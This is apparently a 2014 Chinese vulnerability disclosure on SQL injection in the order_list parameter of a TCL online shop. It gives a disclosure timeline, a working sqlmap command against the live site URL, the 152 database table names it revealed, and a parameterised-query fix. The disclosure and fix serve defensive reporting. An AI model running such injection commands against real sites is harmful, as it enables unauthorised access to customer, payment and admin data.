漏洞详情

披露状态:

2014-09-30: 细节已通知厂商并且等待厂商处理中
2014-09-30: 厂商已经确认,细节仅向厂商公开
2014-10-10: 细节向核心白帽子及相关领域专家公开
2014-10-20: 细节向普通白帽子公开
2014-10-30: 细节向实习白帽子公开
2014-11-14: 细节向公众公开

简要描述:

详细说明:

未对用户输入正确执行危险字符清理

漏洞证明:

存在问题参数order_list
python sqlmap.py -u "http://shop.tcl.com/mall/goods/index.html?attrs_216=541&cat_id=20&order_list=*&porder=stb" --dbs

Database: shoptcl
[152 tables]
+------------------------------+
| base_generate_number |
| c_goods_spec_index_0916 |
| ec_brand |
| ec_brand_category |
| ec_bulk_purchase |
| ec_cart |
| ec_category_spec |
| ec_category_spec_value |
| ec_comment |
| ec_comment_image |
| ec_consultation |
| ec_coupons |
| ec_coupons_goods |
| ec_coupons_use_detail |
| ec_custom_cat_menu |
| ec_evaluate |
| ec_evaluate_detail |
| ec_fenxiao_account |
| ec_fenxiao_copywritten |
| ec_fenxiao_fans_contact |
| ec_fenxiao_goods |
| ec_fenxiao_income_detail |
| ec_fenxiao_income_use_detail |
| ec_fenxiao_level |
| ec_fenxiao_order |
| ec_fenxiao_order_item |
| ec_fenxiao_product |
| ec_fenxiao_share |
| ec_fenxiao_share_stat |
| ec_fenxiao_shop_rela |
| ec_fenxiao_user |
| ec_fenxiao_user_audit |
| ec_fenxiao_user_cust |
| ec_fenxiao_withdraw |
| ec_freight_tpl |
| ec_freight_tpl_area |
| ec_freight_tpl_detail |
| ec_goods |
| ec_goods_collocation |
| ec_goods_custom_cat |
| ec_goods_gift |
| ec_goods_image |
| ec_goods_mapping |
| ec_goods_pkg |
| ec_goods_pkg_detail |
| ec_goods_pkg_image |
| ec_goods_relation |
| ec_goods_set |
| ec_goods_set_detail |
| ec_goods_spec_index |
| ec_group_purchase_item |
| ec_inventory_occupy_detail |
| ec_logistics_info |
| ec_logistics_tracking |
| ec_order |
| ec_order_discount |
| ec_order_item |
| ec_order_log |
| ec_order_msg_log |
| ec_order_refund |
| ec_order_refund_log |
| ec_payment |
| ec_payment_cfg |
| ec_product |
| ec_product_sku_rela |
| ec_product_sku_rela_0918 |
| ec_promotion |
| ec_promotion_discount |
| ec_promotion_integral |
| ec_promotion_present |
| ec_promotion_reduce |
| ec_promotion_seckill |
| ec_push_msg |
| ec_search_keword |
| ec_search_keyword |
| ec_search_log |
| ec_search_rela_keword |
| ec_search_weight_adjust |
| ec_search_weight_rule |
| ec_service_policy |
| ec_shop |
| ec_shop_category |
| ec_shop_sub_account |
| ec_spec |
| ec_spec_value |
| ec_store |
| ec_store_cover |
| ec_store_inventory |
| ec_store_sku |
| ec_transfer_account |
| ec_user_favorite |
| ec_user_history |
| esb_app_info |
| esb_app_permission |
| esb_msg_data |
| esb_msg_que |
| esb_service |
| esb_service_api |
| ro_resource |
| ro_role |
| ro_role_priv |
| ro_seller_log |
| ro_seller_menu |
| ro_subacct_role |
| ro_user |
| ro_user_address |
| sys_access_log |
| sys_admin |
| sys_admin_log |
| sys_admin_role |
| sys_admin_role_priv |
| sys_article |
| sys_caches |
| sys_category |
| sys_custom_category |
| sys_dict |
| sys_dict_type |
| sys_district |
| sys_email_verify_code |
| sys_feedback |
| sys_file |
| sys_file_server |
| sys_file_type |
| sys_image_thumbrule |
| sys_meta |
| sys_object_file |
| sys_point_rule |
| sys_position |
| sys_position_data |
| sys_position_keyword |
| sys_position_space |
| sys_poster |
| sys_poster_click |
| sys_poster_space |
| sys_reg_invite |
| sys_resource |
| sys_role |
| sys_session |
| sys_setting |
| sys_sms_sendlist |
| sys_sms_templates |
| sys_sms_verify_code |
| sys_template |
| sys_template_type |
| sys_user_point |
| sys_user_point_detail |
| sys_user_point_use_detail |
| sys_user_rank |
| sys_widget_callset |
| sys_widget_template |
| sys_widget_type |
| tmp_0916 |
+------------------------------+

修复方案:

参数化SQL语句

标签: none

评论已关闭